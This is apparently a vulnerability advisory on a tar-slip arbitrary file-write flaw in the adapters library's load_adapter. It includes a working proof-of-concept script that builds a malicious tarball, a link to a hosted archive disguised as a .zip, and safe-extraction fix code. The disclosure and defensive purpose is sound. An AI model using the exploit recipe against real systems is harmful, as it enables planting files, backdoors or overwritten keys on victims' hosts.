Description
The adapters library supports loading adapters from remote URLs. When the downloaded file is recognized as a tarball, the loader extracts it with tarfile.extractall(...) directly into a target directory. An attacker-controlled tarball can include entries with absolute paths or ../ sequences that write files outside the extraction directory (tar-slip). Because the loader only checks tarfile.is_tarfile() and never validates member paths, a malicious archive fetched from a remote URL can write arbitrary files on the victim host during load_adapter(...). The attacker can even disguise the archive by changing its extension (e.g., .zip) while keeping the tar content.
Root cause
The vulnerable code calls tarfile.extractall() without validating member names:
adapters/src/adapters/utils.py, lines 460 to 463 in e10ebf0:
elif tarfile.is_tarfile(output_path):
    tar_file = tarfile.open(output_path)
    tar_file.extractall(output_path_extracted)
    tar_file.close()
tarfile.extractall will extract members with absolute paths or .. components as given. There is no sanitization or canonical-path check to ensure extracted paths remain inside output_path_extracted.
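The missing check can be illustrated with a minimal sketch that resolves each member name against the destination and reports the ones that land outside it. The helper names `find_escaping_members` and `build_demo_archive` are hypothetical and not part of the adapters library, and the sketch only inspects member names; it does not examine symlink or hardlink targets.

```python
import os
import tarfile
import tempfile
from io import BytesIO


def find_escaping_members(tar: tarfile.TarFile, dest_dir: str) -> list[str]:
    """Return names of members whose resolved path falls outside dest_dir."""
    base = os.path.realpath(dest_dir)
    escaping = []
    for member in tar.getmembers():
        # os.path.join discards `base` when member.name is absolute,
        # and realpath collapses any ".." components.
        target = os.path.realpath(os.path.join(base, member.name))
        if os.path.commonpath([base, target]) != base:
            escaping.append(member.name)
    return escaping


def build_demo_archive() -> BytesIO:
    """Build an in-memory tar with one benign and two escaping entries."""
    buf = BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name in ("adapter_config.json", "/tmp/hacked.txt", "../outside.txt"):
            data = b"x"
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tf.addfile(info, fileobj=BytesIO(data))
    buf.seek(0)
    return buf


# Nothing is extracted here; the archive is only inspected.
with tempfile.TemporaryDirectory() as dest:
    with tarfile.open(fileobj=build_demo_archive()) as tf:
        print(find_escaping_members(tf, dest))
```

Under these assumptions, the absolute-path entry and the `../` entry should be reported while `adapter_config.json` is not.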
Proof of Concept
- Create a malicious tarball that contains a file with an absolute path (or a .. path):
import tarfile
from io import BytesIO

def create_malicious_tar(tar_path):
    with tarfile.open(tar_path, "w:gz") as tf:
        # file written to /tmp/hacked.txt on extraction
        info = tarfile.TarInfo(name="/tmp/hacked.txt")
        data = b"You have been hacked!\n"
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))
        # include normal adapter files so archive looks legitimate
        info = tarfile.TarInfo(name="adapter_config.json")
        data = b'{"some":"config"}\n'
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))
        info = tarfile.TarInfo(name="pytorch_adapter.bin")
        data = b"FAKEBINARY"
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

create_malicious_tar("adapter.tar.gz")
print("Created malicious tar: adapter.tar.gz")
- Host the malicious tarball online (the attacker can name it adapter.zip to disguise it).
- A user who is drawn to the adapter archive loads it with the adapters library:
from adapters import AutoAdapterModel
model = AutoAdapterModel.from_pretrained("roberta-base")
url = "https://huggingface.co/XManFromXlab/adapters-load_adapters-tarslip/resolve/main/adapter.zip"
adapter_name = model.load_adapter(url)
- When load_adapter downloads the file and passes it to the tarfile branch, extractall writes /tmp/hacked.txt (or any crafted path) on the host. The archive can be crafted to overwrite arbitrary writable files or to place web shells or backdoors in predictable locations.
Note: tarfile.is_tarfile() returns True for tar content regardless of the file name or extension, so a misleading extension does not prevent the attack.
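The content-based detection can be checked with a short sketch that writes a gzip-compressed tar under a .zip name and asks both the tarfile and zipfile modules what they see. The file name adapter.zip inside a temporary directory is only an illustration.

```python
import os
import tarfile
import tempfile
import zipfile
from io import BytesIO

with tempfile.TemporaryDirectory() as tmp:
    # A tar.gz archive saved under a misleading .zip name.
    disguised = os.path.join(tmp, "adapter.zip")
    with tarfile.open(disguised, "w:gz") as tf:
        data = b'{"some":"config"}\n'
        info = tarfile.TarInfo(name="adapter_config.json")
        info.size = len(data)
        tf.addfile(info, fileobj=BytesIO(data))

    # Both checks inspect the file content, not the extension.
    looks_like_tar = tarfile.is_tarfile(disguised)
    looks_like_zip = zipfile.is_zipfile(disguised)

print("is_tarfile:", looks_like_tar)
print("is_zipfile:", looks_like_zip)
```

On a standard CPython installation this should report the file as a tar archive and not as a zip archive, which is why renaming the file does not keep it out of the tarfile code path.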
Impact
This is a high-severity arbitrary file-write vulnerability. A remote attacker who can host an adapter archive (or trick users into loading one) can write files anywhere the process has write permission, create persistent indicators, drop scripts, overwrite configuration or keys, or otherwise escalate to further compromise. The attack needs no further user interaction: merely calling load_adapter(url) on a maliciously crafted archive triggers the write.
Recommended fixes
Replace tarfile.extractall with a safe extractor that sanitizes member paths.
Refer to the implementation in Keras: https://github.com/keras-team/keras/blob/47d1cba8ece3cd0776d95e8007dbd0ad5a8c641a/keras/src/utils/file_utils.py#L56-L116
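As a rough illustration of what such a safe extractor could look like, the sketch below validates every member before extracting anything. It is not the Keras implementation and not code from the adapters library; `safe_extract_tar` and `write_demo_tar` are hypothetical names. It assumes adapter archives only need regular files and directories, so it rejects links and special files outright. On Python releases that provide extraction filters, it additionally passes filter="data" to extractall as a second layer of defense.

```python
import os
import tarfile
import tempfile
from io import BytesIO


def safe_extract_tar(archive_path: str, dest_dir: str) -> None:
    """Extract archive_path into dest_dir, refusing members that escape it."""
    base = os.path.realpath(dest_dir)
    with tarfile.open(archive_path) as tar:
        members = tar.getmembers()
        # Validate everything first so a bad archive writes nothing at all.
        for member in members:
            if not (member.isfile() or member.isdir()):
                raise ValueError(f"unsupported member type: {member.name!r}")
            target = os.path.realpath(os.path.join(base, member.name))
            if os.path.commonpath([base, target]) != base:
                raise ValueError(f"member escapes destination: {member.name!r}")
        # Extraction filters are only available on newer Python releases.
        kwargs = {"filter": "data"} if hasattr(tarfile, "data_filter") else {}
        tar.extractall(base, members=members, **kwargs)


def write_demo_tar(path: str, names: list[str]) -> None:
    """Write a small tar.gz whose members have the given names (demo helper)."""
    with tarfile.open(path, "w:gz") as tf:
        for name in names:
            data = b"demo\n"
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tf.addfile(info, fileobj=BytesIO(data))


with tempfile.TemporaryDirectory() as tmp:
    dest = os.path.join(tmp, "extracted")
    os.makedirs(dest)

    good = os.path.join(tmp, "good.tar.gz")
    write_demo_tar(good, ["adapter_config.json", "pytorch_adapter.bin"])
    safe_extract_tar(good, dest)
    print(sorted(os.listdir(dest)))

    bad = os.path.join(tmp, "bad.tar.gz")
    write_demo_tar(bad, ["adapter_config.json", "../escaped.txt"])
    try:
        safe_extract_tar(bad, dest)
    except ValueError as exc:
        print("rejected:", exc)
```

Validating the whole archive before calling extractall means a single malicious entry causes the entire archive to be refused, rather than leaving a partially extracted adapter on disk.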